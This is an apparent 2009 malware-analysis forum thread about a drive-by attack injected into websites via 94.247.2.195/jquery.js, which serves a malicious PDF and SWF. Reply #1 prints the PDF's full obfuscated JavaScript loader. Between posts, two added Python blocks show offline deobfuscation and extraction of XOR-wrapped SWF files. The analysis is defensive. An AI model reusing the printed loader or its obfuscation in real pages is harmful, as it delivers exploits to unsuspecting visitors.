Author Topic: hs.2-195.zlkon.lv - (94.247.2.195)  (Read 28358 times)


April 07, 2009, 04:31:11 am

sowhat-x
Ok now, that's a pretty "funky" one...
It's being injected into misconfigured sites out there during the last week - you can easily find a few example complaints via google:
http://www.google.com/search?q=94.247.2.195%2Fjquery.js

Quote
hxxp://94.247.2.195/jquery.js
--->
hxxp://94.247.2.195/news/?id=100

So far it can be trivially decoded thanks to Malzilla, and shows us the following...

Quote
hxxp://94.247.2.195/news/?id=2
Which is a pointer to a pdf - Result: 0/40 (0.00%):
http://www.virustotal.com/analisis/e85487bf540c8011c2aafd4369109df3
Plus, a pointer to a swf as well - Result: 0/40 (0.00%):
Quote
hxxp://94.247.2.195/news/?id=3
http://www.virustotal.com/analisis/b17f0747e571ab126f95bad30bc0ad21

I'm not really able to successfully decode them statically without executing them though, any ideas?
I've got the impression that the .swf is more or less the container of a xor key,
that is being used in order for the pdf's contents to be decoded...
Or am I in a completely wrong direction, and should I better go grab myself some extra coffee?...  ::)

Password is "infected", as always...

April 07, 2009, 06:17:04 am
Reply #1

MysteryFCM
I think you could be right :( ..... the following is the uncompressed output from the PDF:

Code:
(gt=/,<@:|>-@|@:->;|,;:, |.  |><.-|-.;.|;;,@>| ,.|-@<@/g;\(function\(tmx,rts\){zz=\('ff'+'n'+tmx.substr\(0,9612\)+'1'\).substr\(3,9615\).replace\(rts,''\)}\)\('fun,;:, ction>-@ g3\(t\){var;;,@> d><.-=>-@"",c1,;;,@>c2,c3,>-@e><.-=[],j=0,,<@:k=";;,@>eZCd05;;,@>W@:->;gRrA-@<@n1j+S2PcMhB4wfOD@:->;Ey-@<@96tivp>-@=l-.;.HmJzoYNkGX8FLVTqQ3asxUIb.  7/.  K-.;.u>-@";do{for\(v ,.ar i=,<@:1;i<5;i+@:->;+\);;,@>e[i ,.]-@<@=k.indexOf\(t>-@.charAt@:->;\(j-@<@++\)\);c,;:, 1=\(e[1 ,.]<<2\)|\(e[@:->;2]>>4\)@:->;;c2=,;:, \(,;:, \(e[>-@2]&15\)<<4\)|\(e[3]@:->;>>2\);c3 ,.=\(.  \(e,<@:[3]&-.;.3\)<<6\)|e[4];-.;.d=d+Stri>-@ng.-.;.fr,;:, om@:->;Char@:->;C,;:, o-@<@de\(c1 ,.\);@:->;if\(e[3;;,@>]!.  =64\)d=d+St,;:, rin,;:, g.f,;:, rom><.-CharCod>-@e\(c2\) ,.;if@:->;\(e[4@:->;]!=@:->;64\)d=d+><.-Str,;:, ing.fromChar.  Co,;:, de\(>-@c3\);-.;.} ,.while\(j<t.length\)><.-;re@:->;t@:->;urn>-@ d;}e@:->;va>-@l\(g3\("9HZHPBvqh3-.;.y794xHy3j.  vyWhzRp;;,@>B,<@:Qj ,.d1q1VBQjd1q1 ,.VBQj.  d1-@<@q1VB-.;.Q10O52pB@:->;Q1.  T1-.;.Q2pBQ ,.j=Od+cBQ+dZ><.-C+c,<@:BQ+d-@<@eF1-.;.c.  B;;,@>QPh ,.f;;,@>T ,.1,;:, VBQPM,<@:R-.;.q;;,@>1VBQ-.;.P><.-hr>-@W ,.2cBQP-.;.M-@<@iF><.-jcBQP ,.l.  O52V@:->;B@:->;QP,;:, lOWPp ,.B,;:, Q+0RaPpBQP>-@0.  f-@<@qP>-@c;;,@>B,;:, Q-@<@PhO5PpBQ@:->;j ,.=P;;,@>5PpBQPMjZPp-.;.BQ+ ,.h-@<@f3jCBQ>-@j ,.drW.  1VBQ+hf3jCBQ.  jlB5jVBQP><.-hfF1VBQ;;,@>PhO.  5-@<@2pBQj=P><.-5>-@PpBQ,<@:2=lF1VBQj=0sjVBQPM5Z1c.  BQ-.;.1d><.-y,;:, F-@<@1;;,@>VBQPhfL>-@1cB;;,@>Q-.;.P,;:, h><.-O5Pp-@<@B.  Q2h03jpBQ,;:, 2=H52pBQjTy@:->;sjVBQj,;:, =-@<@hL1cBQ1d951.  cBQP>-@hfLPpBQPhO5Pp>-@BQ2h0@:->;3jpBQ2=H5jVBQ2q-.;.0,;:, sjVB.  Q1,<@:M ,.eQPpBQ1dyVPCBQPh.  fFPCB>-@QPhO5PpB;;,@>Q ,.2h><.-03jp-.;.BQ;;,@>2=H51V.  BQ1.  desjVBQ10fV.  1-@<@cBQ1d><.-y-.;.sPp.  BQ,<@:PhfT,<@:2pBQ><.-P@:->;hO5P.  p;;,@>BQ,<@:2h>-@03j,<@:pBQ2=H.  
W,;:, Pp><.-BQ1lh><.-sjVBQ1,;:, 0,;:, 0x;;,@>jpB>-@Q1-@<@dy,<@:QjVBQP;;,@>h><.-fV+,<@:c>-@BQP-@<@hO5P ,.pBQ2h03 ,.jpBQ,;:, 2h><.-OW><.-2-.;.p ,.BQP-@<@dy3P>-@pBQ><.-+ ,.h0V2-@<@V-.;.BQj=fL@:->;jcBQP=@:->;9Z2cB@:->;QPMi>-@F,<@:jpBQ.  PhO5PcB-@<@Q2=5;;,@>5-.;.PpBQ>-@+h03jpBQj=Pd2pBQPh-@<@rZ>-@2>-@cB.  QPhh,;:, sjc><.-BQj=PC><.-jp@:->;BQP=9C2cBQ1d9,;:, C+cBQ@:->;Phf3j,;:, CBQ ,.PhO><.-5 ,.P>-@p-@<@BQ+.  d9CPpBQP=.  B-@<@0,;:, +cBQ@:->;+-.;.hO@:->;d1CBQjTiFjVB ,.Q>-@PhO5Pp;;,@>B ,.Qj=O,<@:5Pp;;,@>B.  Q.  P=jZ-.;.2cB-@<@Q1l03jCBQ1-@<@lf32V-.;.B-@<@Qj=OCPpBQ2qOZ-.;.2cBQ1MesjV,<@:B>-@QPhO5PpBQ2lO5,;:, Pp><.-BQ2h03;;,@>j,;:, CBQ+d@:->;BW;;,@>2pBQ2=O5PC@:->;BQ.  2l0><.-3j ,.CBQ1d9WjVB>-@QPhfs;;,@>PcBQPhO,;:, 5Pp@:->;B@:->;Q2h55.  2VBQ><.-1=vdP,;:, p>-@B,<@:Q2-@<@=j>-@5,;:, PpB@:->;Q@:->;2T0x,;:, 1cBQ1=i.  s2-@<@cBQPh-.;.rZ-.;.P@:->;p-@<@BQ,;:, + ,.00xjVBQPh,<@:O5P@:->;pB,;:, Q+h0.  L>-@1C-.;.B>-@Qj=Pd@:->;PpBQPMj;;,@>Z,<@:2cBQPhhsj.  cBQj>-@=PCj ,.p><.-BQ ,.P ,.=9C2cBQ2hfFjVB><.-QPh><.-O5PpBQ+dB5P;;,@>pBQ2=95.  +-.;.C,<@:B ,.Q2h552VB,;:, QP0j;;,@>d2pBQ2l,;:, 1TjC ,.BQ><.-1MZC2-.;.VB,;:, Q2>-@q-.;.f-.;.x2 ,.cBQ2lj,;:, C ,.PpBQ2h03j,;:, CB-@<@Q+d-@<@BW1VB@:->;Q2-@<@=O52cBQ2l,<@:03jC.  BQ,<@:1d@:->;9>-@WjV,<@:BQ,<@:P.  hOd2VBQPh>-@O5PpB.  QPh@:->;fsjcBQ+h>-@0><.-L1,<@:CBQj=PdP-.;.pBQ@:->;PM9Z2;;,@>cBQPh2sjcBQ,;:, j@:->;=PCj,<@:pBQP=9C2c,<@:BQPl-@<@fFj-@<@VBQPhO5-@<@PpBQ>-@+dB5.  PpB ,.Qj-.;.=2L1CBQP ,.lO,;:, Z2cBQPhh,<@:s;;,@>j-@<@cBQ-@<@j=PCjpBQP=9><.-C2c>-@BQPhfF-@<@jVBQ;;,@>PhO5PpBQ ,.2-.;.hB@:->;5><.-P>-@pBQ2lPC,;:, jC-@<@BQ10B52VBQ><.-10B5-@<@2 ,.VBQ10B52,<@:VBQ10@:->;B52-.;.V-.;.BQ1>-@d1 ,.32VBQ2=B,;:, 5,<@:2pBQj=PC@:->;2VBQ1-.;.02T-.;.jcB>-@Q2 ,.l2><.-L.  +CB,<@:Q1,;:, 0.  fL1.  CBQj@:->;=PC2cBQj=2F1VBQP;;,@>M><.-yx,<@:1>-@pBQ2-.;.=R,<@:3jCBQ2=;;,@>H5>-@1VBQ+h1><.-3jCB,;:, Qj=P.  01VBQ><.-P=-@<@0x2pBQPh1><.-x-@<@jVBQ2=l-.;.L2><.-VBQ+.  Ml3jC-@<@B@:->;QPh,<@:jd ,.PpBQP01L2VB,<@:Q2Mf-.;.VjpBQjdrZPcBQ1l@:->;j5,<@:2><.-VB,;:, QP0jC+.  
cBQ,;:, PMeL+cBQ>-@PlfQ1;;,@>cBQ-@<@1h;;,@>P0;;,@>jcB><.-QPM@:->;yx2pBQ1=0 ,.VP,<@:cBQPhj51pBQ2,;:, h,;:, fL.  PC ,.BQ1h@:->;hFjCBQ1M,;:, 5,<@:0,<@:jC ,.B;;,@>Q+h.  5C>-@1@:->;c ,.BQ2=hF2.  cBQ1 ,.d23j,;:, C;;,@>BQ.  2=h3.  jCB-.;.QPh ,.jd2,;:, pBQ ,.+dlT1pBQ,<@:PM13jCBQ;;,@>j=,;:, PZ;;,@>j>-@CB@:->;QP=jCjcB,;:, Q.  1Tr@:->;52V><.-BQPhR><.-3jCBQPh ,.13j;;,@>C><.-BQ-.;.2=0V,;:, 2cB.  Q1lP.  C1,<@:pBQPh><.-O5@:->;jVBQ1hRFj.  VBQ-.;.1-.;.MeL1-@<@c><.-BQ-@<@2l0><.-L1CBQ-@<@2MjCPC,;:, BQ2MZZ>-@1p><.-BQP,;:, hOZ1cBQjT23+CBQjT,<@:ea;;,@>jCBQ1lfT2-@<@cB><.-Q1,<@:Tl,;:, VP;;,@>pBQ@:->;1lhTjCBQ1 ,.T2T><.-1,;:, pBQ1lhTjVBQ1><.-lhT>-@1pBQ1T;;,@>lT1.  cB@:->;Q1-.;.lfTjcBQj><.-=-.;.h3-.;.PcBQjT1.  aj;;,@>VBQ,<@:1-.;.q.  fVPpB,<@:Qj=><.-23+cB-@<@Q1T0><.-TPC ,.B.  Q1= ,.f.  T1C ,.R,;:, o+VZ><.-3fw>-@Rihd,<@:5kyQ,<@:P.  2PaesM;;,@>ce ,.7RWx>-@H9V,;:, Z><.-Z,<@:yJr,<@:v6ci-@<@o+VZ,<@:m94x=9,<@:W-.;.H8EpZ,<@:X6wi3-@<@Ed0z-.;.Ew-@<@9zyq.  Gf1>-@Jfk,<@:RW.  P ,.P6,<@:WLq9-@<@W><.-rZy-@<@wPa.  +45SAc ,.ZI-@<@Rg9zD,;:, 4LHRCvG93vTcQ ,.iV9pxk>-@O4xJ9Wi,;:, Y><.-1=Ll>-@hwv,<@:k><.-9><.-g ,.Pp2w.  5@:->;q9;;,@>T-@<@H-@<@vMV><.-H;;,@>IEw9><.-z>-@yq@:->;Gf1 ,.JfiATqiEw9 ,.zy;;,@>qGf1JfItcZG9><.-3vTcQiV-.;.9pe7RWQa-@<@D ,.gjn4dr3n;;,@>Jj ,.Qf,;:, J-@<@jqymH;;,@>XOViFnW,;:, PP6,;:, WL,<@:q9WrZywPa+45@:->;SnTRo@:->;+VZVOw;;,@>PQy,<@:msiEw9zyq.  Gf1JfIRgqiOJBX-.;.fa><.-P-@<@oE3sicHBL4l.  5,<@:+PHlz901,<@:QfB5C2J>-@0o-@<@Rgk,;:, i9m5VRWb>-@q.  fm,;:, BUPhoR9hfiSce@:->;F6d,<@:Z=1W1>-@Ff>-@TZ=@:->;+VZ3fwRihW9>-@Fy0z>-@QDC;;,@>e7R;;,@>dZsjd ,.eF1deF+V.  Z3.  f.  w.  R>-@i@:->;M-.;.wvzyTHa>-@4@:->;JB1+5;;,@>OW4Mf-.;.iSc,;:, Zq>-@2TBvh,;:, hrCycxkO4x,;:, J.  9Wi@:->;iApeV+.  VZ3f,<@:wRiO55sEg;;,@>P@:->;qf,;:, l><.-5-@<@L9gyxfhbiScZ><.-2O>-@a@:->;Z-.;.Fc ,.= ,.BzR><.-C,<@:q><.-i,;:, A-@<@0Q@:->;s.  Dg1x9,<@:Q.  oQMdv4PHl>-@3A-.;.TZs1T@:->;io+.  VZ3@:->;fwRiE,;:, w9zyqGf1Jf><.-i ,.ScZQEmBTf35FOcip-.;.r,;:, whx1d ,.lFrw,;:, hx,<@:1dl.  FR,;:, pl@:->;IRWQ>-@aDg ,.jn-@<@4dr><.-3R.  
dqiE>-@J,;:, Hs,;:, jmFLAWQaDg-@<@jn4dr-@<@3><.-nCZl,<@:h-@<@wvk><.-9gPp2,<@:w,;:, 5q9,;:, THvM-.;.VlI,;:, R-.;.gO><.-vypZOP-.;.J9U,;:, DhQg><.-Rdqi-@<@AWbqfm><.-B>-@U.  PhoR9hfinceF6 ,.d2><.-F1d.  eF1C;;,@>l8-.;.hW9Fy,<@:0 ,.z ,.QDd.  k-.;.iOm-.;.7VRCv3f><.-w,<@:Ri;;,@>OQixMlr;;,@>p><.-4=HjM4HqSMeIO>-@QixMlrp>-@4,;:, =H@:->;j,;:, M4HqS5,<@:H.  W9@:->;aooM,;:, hyI-@<@OQixMlr.  p4=H-.;.jM4HqA.  Vk ,.oRgk ,.i@:->;hd5kyQ ,.P2PaesMBGJ4d.  H+2mrD+,<@:hQjDw@:->;P9R><.-dqi-@<@E,;:, w ,.9z-.;.yqGf1JfiAVZ;;,@>q ,.2,<@:TBvhhr,<@:Cy>-@M;;,@>kitcZ7RWOQEm@:->;j-.;.qD4-.;.7X,<@:R07+1g2V,;:, Ag-@<@H>-@RB5isAc>-@Z><.-IRgO><.-vypZ06=j-.;.4BJo3RdqifwZFnJ>-@OoOw>-@9 ,.HyH.  O,;:, HyJjoE3,<@:sX9,;:, W7M9,<@:gr,<@:oEmyzAM,<@:kiPgzTBH-@<@O@:->;U>-@9,;:, pe7R0P>-@U1 ,.QO4><.-6Jf><.-XymBF>-@EW5=Oci8w0>-@28OV.  FpRplI-@<@RgOvypZGfM5+E>-@d0Fh-.;.Q-.;.ZxOVe,;:, 7RWxH9VZZyJ ,.r>-@v6cv@:->;0.  6=,<@:j4BJo3n-@<@mj-@<@zfwrZ9C,<@:iFAc ,.L;;,@>06=j4BJo-.;.3nmjzfwrZ.  9@:->;C ,.iLAcL06=j4BJo3nm><.-j>-@z;;,@>fwrZ9C,;:, iV><.-Ac-@<@lIRWHmRCi,<@:zE40LMmF;;,@>L1,<@:5j>-@26><.-4-.;.9E15qiS;;,@>M,;:, qi ,.+,;:, C@:->;e.  mrpe;;,@>zAWQv1,;:, h><.-xk1MZ;;,@>M>-@hgHJ-@<@4,;:, T59R,;:, dq-.;.7Rd0irpfiE@:->;40,;:, L;;,@>M;;,@>mF,;:, L15j264-@<@9E1-@<@HqiSCeV-.;.A><.-cZbtCZ.  Gf,;:, M5;;,@>+Ed-.;.0FhQZxOQkLwcebRd0 ,.oA-@<@cZbtCez,<@:E40LMm-@<@FL1-.;.5j264-.;.9E><.-1-.;.5qi><.-SM,;:, qijVe-.;.m>-@rpZ.  Gf.  M5-@<@+Ed0;;,@>FhQ@:->;Zx;;,@>OQ-@<@kLw.  c@:->;e,<@:bRd0o,<@:RgLb><.-RCvGfM5+-.;.Ed0Fh-.;.QZx@:->;OQkF ,.wcebR;;,@>dyo ,.AcZIR0o,;:, ByBoZM ,.lO-@<@OA@:->;gH,<@:RB5i;;,@>sAMki.  9m-.;.5VR0Ozh;;,@>qP-@<@Z9w.  Zj6,<@:JZp ,.Rd@:->;q,;:, i94,<@:xHy-@<@3.  j-.;.vy><.-Wh.  zRpBQ,<@:1W1FfV ,.BQ-.;.1;;,@>W1F-.;.fVR,<@:o+V,<@:Za@:->;DWHk ,.OcvWD5@:->;j02-@<@wBFM-.;.w-.;.oFf.  px.  kO><.-4.  x,<@:J9Wi-.;.iSC,;:, eqjd ,.lQ,;:, 1pliPmvMP05,;:, Q;;,@>y0>-@QUyWRiA,<@:T@:->;qi><.-PmvMP ,.0 ,.5Qy0@:->;QUyWRIRg,;:, PzDw-.;.1Xf37-@<@kEW5,<@:p ,.haP8ymh ,.iS-@<@cZ,<@:dE3Lkf4;;,@>RXf37kEW.  
B=90BGf ,.4-.;.Hkc4xmEV@:->;vI,<@:yaBpD-.;.=zi>-@RpRkEwjJ+pZW,<@:D5j02wBF,;:, M-.;.woFf;;,@>Jq@:->;o;;,@>+VZV><.-OwP><.-Qy,;:, msi1dki>-@t;;,@>wrH,<@:9g;;,@>BVEp><.-eL-@<@+.  V.  Z7RWHmA0-@<@7+,<@:1 ,.g2VAgO2OhBf95jJ,;:, AcHIRgO-.;.v,<@:ypZzD-.;.BiqP ,.wvz>-@y>-@H,<@:y79 ,.4xH,<@:y3 ,.jvyW><.-hzRpBQ100@:->;F2cB><.-Q><.-100F2cRo,;:, +aOvypZXEMqV1>-@dG,;:, 3;;,@>fwRiOm>-@y7-@<@EmqN9.  HZHPBvq;;,@>h@:->;3yXEWBXO,;:, aPz+VZa,<@:DWHk-@<@OcvzD><.-B><.-iqPwv,<@:zyHyXE-.;.WBXOa ,.PzSW,;:, OJ;;,@>A4vo4;;,@>dP56Wv-.;.VBV-.;.k;;,@>7DWH-@<@f,<@:j0BsDgrw;;,@>+-.;.aOv>-@yp-@<@ZXE-@<@4 ,.rVS4,<@:vo4,;:, dP56WvVBV,<@:xT ,.94rT-@<@9 ,.g.  r-.;.oEm;;,@>yz1CL ,.mOV,;:, lIRgOvyp;;,@>ZT9WHJS4vo-@<@4dP56WvVBV ,.x><.-T@:->;94rT9groEmyz1CLz><.-D;;,@>Bi ,.qPwvzy><.-H-.;.yXE;;,@>W ,.B-@<@XOaPzn4OJAM>-@ki93v>-@oEWhz>-@yaPoOVxkO4,;:, xJ.  9Wi@:->;NOmyb1g-.;.i31d.  eF1-@<@C,<@:HT><.-9W@:->;HJS.  wj.  qD4yNya>-@PoO,;:, V><.-G-.;.XE-@<@4rV-.;.+VZ3fwR-.;.ifwrV><.-EMQXOwyi2wr,;:, V@:->;fwlzAMGmE-.;.a.  RzD,<@:w;;,@>z71dGo6;;,@>=FL1=eF><.-+><.-3><.-HU><.-AVko6-@<@35@:->;VymQEDw-.;.o9;;,@>S.  w><.-jqD-.;.4yN9HZHPBvq>-@h-@<@397Rg-.;.OvypZ+hh5kPq ,.vaPT@:->;q><.-p1MRxRpkp+Ml.  x+ ,.Mlx+@:->;Ml@:->;p;;,@>A;;,@>VRx+Mlx+cRN-@<@R-.;.=><.-lx+MlpAVRs+dis,<@:+d,<@:isRpkp-@<@+dis+d ,.is><.-+dis@:->;+d;;,@>is+>-@di@:->;s+dis><.-+di ,.s ,.+dis+d,<@:is>-@+di>-@s>-@Rpkp+dis+ ,.d,<@:is@:->;+d-@<@is+dis+dis+dis+dis+dis+d@:->;is+dis ,.+,;:, di@:->;s+.  dis.  +dis+d-@<@is+><.-d;;,@>is+dis+di-@<@s+d>-@is+dis+dis-@<@+dis+d-.;.is+-.;.dis+;;,@>dis+dis+,;:, d@:->;is+d><.-is+d.  is+-.;.di@:->;s+dis+di.  s+d-.;.is+,<@:dis;;,@>+dis+dis-.;.+><.-di-.;.s+di,;:, s+dis><.-+.  dipAVRs+di><.-s+d.  is+d,<@:is@:->;+d-.;.is+><.-d><.-i,;:, s+dis+dis+d><.-i ,.s+di><.-s+di.  s+dis+dis+d><.-i;;,@>s+di-.;.pA;;,@>VRs+>-@d-.;.is+;;,@>dis>-@+dis-.;.+dis+dis+d><.-is+di@:->;s+d>-@is+.  
dis;;,@>+dis@:->;+di-@<@s+CR,;:, N,<@:R>-@=is+di,;:, s+di;;,@>s+dis+dipAVR,<@:s+dis+dis+dis+dis+dis+;;,@>disRpk-.;.p+-.;.di@:->;s,;:, +d><.-is+dis+d;;,@>is+di,;:, p-@<@+VZ,;:, Q,<@:9,;:, W><.-HknJZ;;,@>VD-.;.4-.;.xqOpiprM2Q1d ,.eFO ,.pRkMH5,;:, ZE09R@:->;9,;:, q-.;.yo+aqu"\)\);',gt\);eval\(\('ac'+'d'+zz+'cd'+'m'\).substr\(3,zz.length\)\);)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net
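The uncompressed PDF script above is a two-stage obfuscation: the first stage deletes the junk tokens listed in the `gt` regex from a string and evals what is left, and the `g3(t)` routine that emerges is a base64 decoder over a non-standard alphabet, with the 65th character of `k` acting as the pad (that is what the `e[3]!=64` / `e[4]!=64` tests check). The Python below is an added example of reproducing both stages offline so the second stage never has to be executed; it is not code from the post or from any of the posters. The junk tokens, the alphabet and the payload string are constructed stand-ins rather than the sample's real values, and the `g3("...")` call shape is an assumption.

```python
import base64
import random
import re

# Constructed stand-ins (assumptions): the thread's loader uses its own `gt` regex and
# its own 65-character string `k`; these are not those values.
JUNK_TOKENS = ["~!#", "^%&", "@@_", "|*|"]

STD_B64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
# Non-standard alphabet: a rotation of the standard one, with the pad as the 65th entry
# (index 64), which is what the decoder's `e[3]!=64` / `e[4]!=64` tests rely on.
CUSTOM_B64 = STD_B64[13:64] + STD_B64[:13] + "="


def strip_junk(text, tokens=JUNK_TOKENS):
    """Stage 1, what `.replace(gt, '')` does in the loader: delete every junk token."""
    pattern = re.compile("|".join(re.escape(t) for t in tokens))
    return pattern.sub("", text)


def decode_custom_b64(text, alphabet=CUSTOM_B64):
    """Stage 2, the g3() routine re-expressed: 4 alphabet indices -> up to 3 bytes."""
    if len(alphabet) != 65:
        raise ValueError("alphabet must be 64 symbols plus one pad character")
    index = {ch: i for i, ch in enumerate(alphabet)}
    symbols = [index[ch] for ch in text if ch in index]  # ignore stray whitespace
    out = bytearray()
    for i in range(0, len(symbols) - 3, 4):
        e0, e1, e2, e3 = symbols[i:i + 4]
        out.append(((e0 << 2) | (e1 >> 4)) & 0xFF)
        if e2 != 64:  # index 64 is the pad symbol
            out.append((((e1 & 15) << 4) | (e2 >> 2)) & 0xFF)
        if e3 != 64:
            out.append((((e2 & 3) << 6) | e3) & 0xFF)
    return bytes(out)


def encode_custom_b64(data, alphabet=CUSTOM_B64):
    """Inverse of decode_custom_b64, used only to build the constructed sample."""
    return base64.b64encode(data).decode("ascii").translate(str.maketrans(STD_B64, alphabet))


def inject_junk(text, tokens=JUNK_TOKENS, seed=2009):
    """Sprinkle junk tokens through `text` the way the sample does (constructed)."""
    rng = random.Random(seed)
    pieces = []
    for ch in text:
        if rng.random() < 0.3:
            pieces.append(rng.choice(tokens))
        pieces.append(ch)
    return "".join(pieces)


PAYLOAD = b'var marker = "stage-2 decoded";'  # constructed, harmless stand-in for stage 2
G3_CALL = re.compile(r'g3\("([^"]*)"\)')


def build_sample():
    """Constructed obfuscated script in the same shape as the thread's: g3("...") inside junk."""
    return inject_junk(f'var d = g3("{encode_custom_b64(PAYLOAD)}"); eval(d);')


def recover_payload(obfuscated_js):
    """Run both stages: strip junk, locate the g3("...") argument, decode it."""
    clean = strip_junk(obfuscated_js)
    match = G3_CALL.search(clean)
    if match is None:
        raise ValueError("no g3(...) call found after junk removal")
    return clean, decode_custom_b64(match.group(1))


if __name__ == "__main__":
    cleaned, payload = recover_payload(build_sample())
    print(cleaned)
    print(payload.decode("ascii"))
```

To apply this to the real sample you would copy the alternation from `gt` into `JUNK_TOKENS` (keeping in mind that the sample's `.  ` and ` ,.` alternatives contain an unescaped regex dot) and the junk-stripped `k` string into `CUSTOM_B64`; the decoder itself does not change.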


April 07, 2009, 06:28:25 am
Reply #3

MysteryFCM

April 07, 2009, 06:36:09 am
Reply #4

sowhat-x
The .js is easy, thanks for the pdf - but what about the swf file?
That's what puzzled me the most... Flasm hasn't really got support for flash9, so it couldn't decompile it.
Then I've also tested 2 commercial flash decompilers/disassemblers, and both of them kept crashing, he-he, I wonder why...  ;D
The closest I could get to disassembling it was via abcdump here:
http://iteratif.free.fr/blog/index.php?2006/11/15/61-un-premier-decompileur-as3

April 07, 2009, 06:45:20 am
Reply #5

sowhat-x
Here's abcdump's output, for the sake of easiness...

April 07, 2009, 06:46:30 am
Reply #6

SysAdMini
Ruining the bad guy's day

April 07, 2009, 07:06:16 am
Reply #7

sowhat-x
The xorkey there has a totally different usage than what I had thought originally above... and here's the idea/concept behind it, more or less:
http://blog.dannypatterson.com/?p=135
And now, go check out this paper as well... guys, it's not really good news - but I think we're getting a bit closer regarding how this crap works:
http://www.aladdin.com/pdf/airc/airc-report-jan-09.pdf

April 07, 2009, 07:25:28 am
Reply #8

sowhat-x
By the way, the domain mentioned in the paper is in the list from back in early January... hardmoviesporno.com namely.
So, now I guess we know where to start in order to decrypt this kind of crap as well, but it's pretty cumbersome doing so by hand, pfff....  :(
One more note... in case anyone wants/needs an updated actionscript disassembler with gui as well:
http://www.docsultant.com/nemo440/

April 07, 2009, 07:39:38 am
Reply #9

MysteryFCM

April 11, 2009, 07:22:30 am
Reply #10

toni
sowhat-x:
Hi,
sorry but I didn't spot your message earlier. The system failed to notify me.

I'm on-call the whole Easter so I'm pretty busy but I'll definitely take a closer
look when I have time. I can say though that the flash contains another flash
that is in xorred mode. I haven't had a chance yet to decrypt it but I'll have a
whack at it asap. I'll post you an update when I have something.
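Reply #10 says the Flash contains a second Flash "in xorred mode", which is also where the earlier "container of a xor key" guess and the Danny Patterson link point. The Python below is an added example, not code from the thread or from any of the posters, of how an analyst can locate and pull out such an embedded SWF without a working decompiler: brute-force every single-byte key against the three SWF signatures and sanity-check the header behind each match. The single-byte key, the version/length sanity limits and the container layout in the constructed sample are assumptions; the real sample may use a longer repeating key, in which case the scan would need extending to the key length (the three magic bytes still recover the first three key bytes).

```python
import struct

SWF_MAGICS = (b"FWS", b"CWS", b"ZWS")  # uncompressed, zlib-compressed, LZMA-compressed SWF


def xor_bytes(data, key):
    """Repeating-key XOR (a single-byte key is just len(key) == 1)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def find_xored_swf(blob):
    """Brute-force every single-byte key and report offsets where an SWF header appears.

    Assumption: a one-byte key. Returns a sorted list of (offset, key_byte);
    key 0 means the header is there in the clear.
    """
    hits = []
    for key_byte in range(256):
        key = bytes([key_byte])
        for magic in SWF_MAGICS:
            needle = xor_bytes(magic, key)
            start = 0
            while True:
                off = blob.find(needle, start)
                if off < 0:
                    break
                start = off + 1
                header = xor_bytes(blob[off:off + 8], key)
                if len(header) < 8:
                    continue
                version = header[3]
                file_len = struct.unpack("<I", header[4:8])[0]
                # Sanity filter against random 3-byte matches: plausible version
                # (assumed 1..50) and a length that at least covers the header.
                if 1 <= version <= 50 and file_len >= 8:
                    hits.append((off, key_byte))
    return sorted(hits)


def extract_swf(blob, offset, key_byte):
    """Decode from the hit onward. FWS carries its own total length; CWS/ZWS store
    the uncompressed size, so for those take the rest of the container (assumption)."""
    decoded = xor_bytes(blob[offset:], bytes([key_byte]))
    if decoded[:3] == b"FWS":
        file_len = struct.unpack("<I", decoded[4:8])[0]
        return decoded[:file_len]
    return decoded


def build_sample(key_byte=0x5A):
    """Constructed container: an outer FWS header, zero filler, then an inner FWS
    XORed with key_byte, then more filler. Returns (outer, inner, inner_offset)."""
    inner_body = b"\x78\x00\x05\x5f\x00\x00\x0f\xa0\x00\x0c\x00\x01\x00" + b"constructed-inner-body"
    inner = b"FWS" + bytes([10]) + struct.pack("<I", 8 + len(inner_body)) + inner_body
    filler = b"\x00" * 32
    outer_body = filler + xor_bytes(inner, bytes([key_byte])) + filler
    outer = b"FWS" + bytes([9]) + struct.pack("<I", 8 + len(outer_body)) + outer_body
    return outer, inner, 8 + len(filler)


if __name__ == "__main__":
    outer, inner, inner_off = build_sample()
    for off, key in find_xored_swf(outer):
        print(f"SWF header at offset {off} under key 0x{key:02x}")
    print(extract_swf(outer, inner_off, 0x5A) == inner)
```

Run against a real dump, the key-0 hit is the outer file itself and every other hit is a candidate embedded stage; feeding the extracted bytes back through the same scan catches a second level of wrapping.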